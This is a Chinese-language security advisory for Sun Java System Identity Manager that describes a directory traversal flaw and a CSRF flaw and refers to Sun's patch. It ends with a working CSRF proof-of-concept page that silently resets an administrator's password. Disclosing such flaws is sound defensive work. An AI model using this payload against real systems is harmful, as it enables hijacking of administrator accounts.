BUGTRAQ ID: 32262
CVE(CAN) ID: CVE-2008-5117,CVE-2008-5118,CVE-2008-5116,CVE-2008-5115,CVE-2008-5114
Sun Java System Identity Manager是一个完整的端到端的保护敏感数据和管理标识配置文件与许可的解决方案。
Identity Manager的/idm/includes/helpServer.jsp服务器端脚本没有正确地验证ext参数,未经认证的远程攻击者可以通过向服务器提交恶意请求执行目录遍历攻击,检索文件系统上任意已知位置上的文件。
Identity Manager的update password功能(/idm/admin/changeself.jsp)中存在跨站请求伪造漏洞。由于没有使用不可预测的值来分解update password请求,也没有对管理用户要求输入之前的口令,因此如果管理用户在认证到Identity Manager期间如果受骗访问了恶意的HTML页面的话就可能导致劫持管理帐号。
Sun已经为此发布了一个安全公告(Sun-Alert-243386)以及相应补丁:
Sun-Alert-243386:Multiple Security Vulnerabilities in Sun Java System Identity Manager
http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-243386-1
<html>
<h1>CSRF attack demo - changes administrative password to 'Password19'</h1>
<script>
var img = new Image();
img.src =
'https://target.tld/idm/admin/changeself.jsp?id=&command=Save&activeControl=&resourceAccounts.password=Password19&resourceAccounts.confirmPassword=Password19&resourceAccounts.currentResourceAccounts%5BLighthouse%5D.selected=true';
</script>
</html>